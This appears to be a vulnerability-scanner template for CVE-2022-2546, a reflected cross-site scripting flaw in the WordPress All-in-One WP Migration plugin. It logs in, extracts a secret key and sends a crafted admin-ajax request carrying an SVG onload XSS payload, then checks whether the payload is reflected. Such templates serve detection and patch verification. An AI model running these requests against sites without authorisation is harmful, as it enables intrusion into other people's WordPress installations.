id: CVE-2022-2546

info:
  name: All-in-One WP Migration plugin - Cross-Site Scripting (XSS)
  author: theamanrawat
  severity: medium
  description: |
    Reflected Cross-Site Scripting (XSS) vulnerability in WordPress All-in-One WP Migration plugin (versions <= 7.62).
  reference:
    - https://wpscan.com/vulnerability/f84920e4-a1fe-47cf-9ba5-731989c70f58
    - https://wordpress.org/plugins/all-in-one-wp-migration/
    - https://patchstack.com/database/vulnerability/all-in-one-wp-migration/wordpress-all-in-one-wp-migration-plugin-7-62-unauthenticated-reflected-cross-site-scripting-xss-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2546
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2546
  classification:
    cve-id: CVE-2022-2546
  metadata:
    verified: true
  tags: cve,all-in-one-wp-migration,authenticated,wpscan,cve2022,wordpress,wp-plugin,wp,xss

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=ai1wm_export HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bnew_value%5D%5B%5D=XSSPAYLOAD%3Csvg+onload=alert(document.domain)%3E&ai1wm_manual_export=1&secret_key={{secretkey}} HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - contains(all_headers_3, "text/html")
          - status_code_3 == 200
          - contains(body_3, '{\"new_value\":[\"XSSPAYLOAD<svg onload=alert(document.domain)>')
        condition: and

    extractors:
      - type: regex
        name: secretkey
        group: 1
        regex:
          - 'ai1wm_feedback"},"secret_key":"([0-9a-zA-Z]+)"'
        internal: true